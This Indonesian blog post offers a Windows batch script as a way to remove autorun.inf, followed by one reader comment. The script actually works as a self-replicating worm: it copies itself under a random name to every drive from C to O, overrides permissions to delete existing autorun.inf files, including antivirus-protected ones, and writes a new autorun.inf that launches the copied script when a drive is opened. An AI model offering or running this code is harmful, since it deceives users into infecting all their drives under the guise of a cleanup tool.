Menghapus autorun
Memang banyak anti virus yang menyediakan tool untuk menghapus file Autorun.infsalah satunya adalah smadav, tapi gak ada salahnya belajar sendiri pake batch :
@echo off
::Buat Nama Acak
Set auto=%random%
::Cari ke semua drive
For %%p in (C D E F G H I J K L M N O) do if exist %%p:\ (
::Menduplikat diri dengan nama acak tadi
copy "%0" "%%p:\%auto%.bat" /y
::Edit access control list
Cacls %%p:\autorun.inf /p everyone:f /e
::Hapus paksa autorun
RD /s /q %%p:\autorun.inf
DEL %%p:\autorun.inf /f /a /q
::Buat autorun baru
Echo [autorun]>%%p:\autorun.inf
Echo ShellExecute=%auto%.bat>>%%p:\autorun.inf
Echo Shell\Open\Command=%auto%.bat>>%%p:\autorun.inf
Echo Shell\Explore\Command=%auto%.bat>>%%p:\autorun.inf)
rem Akhir kode
rem salam BENNY KIRANA
Sudah di kopas ke notepad, nah sekarang penjelasan cara kerjanya :
Pertama; akan dibuat file dengan nama acak (random) ke setiap drive yang di tuju,
jadi jangan kaget kalo ada file aneh di drive loe contohnya file "8750.bat" dan
akan memiliki nama yang berbeda di setiap drive, tapi isinya ya kodingan ini!
Kedua; jika ada file autorun.inf, dengan asumsi bahwa file tersebut bawaan dari
virus, bahkan kalo loe bikin file autorun.inf sendiri juga bakal di apus.
Ketiga; akan membuat file autorun.inf baru yang isinya, mengeksekusi file dengan
"randomize name" tadi.
Catatan: Gue pernah bikin yang sekaligus ngapus folder autorun.inf, cuman kepentok,
karena setiap folder autorun.inf memiliki perbedaan, coba aja loe apus folder
autorun.inf buatan smadav, walaupun sebelumya gue kasih cara buat bikin juga apus
folder yang ga bisa di apus, tetep aje folder autorun.inf smadav ga bisa di apus
kenapa? karena kode ascii yang disertakan dalam folder autorun.inf milik smadav
bersifat unik.
Langganan:
Posting Komentar
(
Atom
)
artikelna bgus gan,klo boleh nanya..
BalasHapustrus agan sudah dapat solusi buat menghapus folder autorun.inf buatan smadav via bacth.